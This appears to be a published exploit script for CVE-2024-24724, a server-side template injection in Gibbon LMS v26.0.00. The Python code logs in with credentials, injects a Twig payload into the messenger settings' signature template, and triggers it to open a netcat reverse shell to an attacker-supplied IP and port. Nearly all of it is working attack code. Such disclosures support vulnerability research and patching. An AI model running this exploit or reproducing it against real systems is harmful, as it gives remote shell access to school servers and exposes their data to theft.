|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82  |  # Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability # Date: 21.01.2024 # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24724 import requests import re import sys def login(target_host, target_port,email,password):  url = f'http://{target_host}:{target_port}/login.php?timeout=true'  headers = {"Content-Type": "multipart/form-data;  boundary=---------------------------174475955731268836341556039466"}  data =  f"-----------------------------174475955731268836341556039466\r\nContent-Disposition:  form-data;  name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:  form-data;  name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:  form-data;  name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:  form-data;  name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:  form-data;  name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:  form-data;  name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"  r = requests.post(url, headers=headers, data=data,  allow_redirects=False)  Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])  if Session_Cookie[4] is not None and '/index.php' in  str(r.headers['Location']):  print("login successful!")  return Session_Cookie[4] def rce(cookie, target_host, target_port, attacker_ip, attacker_port):  url =  f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'  headers = {"Content-Type": "multipart/form-data;  boundary=---------------------------67142646631840027692410521651",  "Cookie": cookie}  data =  f"-----------------------------67142646631840027692410521651\r\nContent-Disposition:  form-data; name=\"address\"\r\n\r\n/modules/School  Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:  form-data;  name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:  form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo  /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port}   >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"  r = requests.post(url, headers=headers, data=data,  allow_redirects=False)  if 'success0' in str(r.headers['Location']):  print("Payload uploaded successfully!") def trigger(cookie, target_host, target_port):  url =  f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'  headers = {"Cookie": cookie}  print("RCE successful!")  r = requests.get(url, headers=headers, allow_redirects=False) if __name__ == '__main__':  if len(sys.argv) != 7:  print("Usage: script.py <target_host> <target_port>  <attacker_ip> <attacker_port> <email> <password>")  sys.exit(1)  cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])  rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])  trigger(cookie, sys.argv[1], sys.argv[2])  |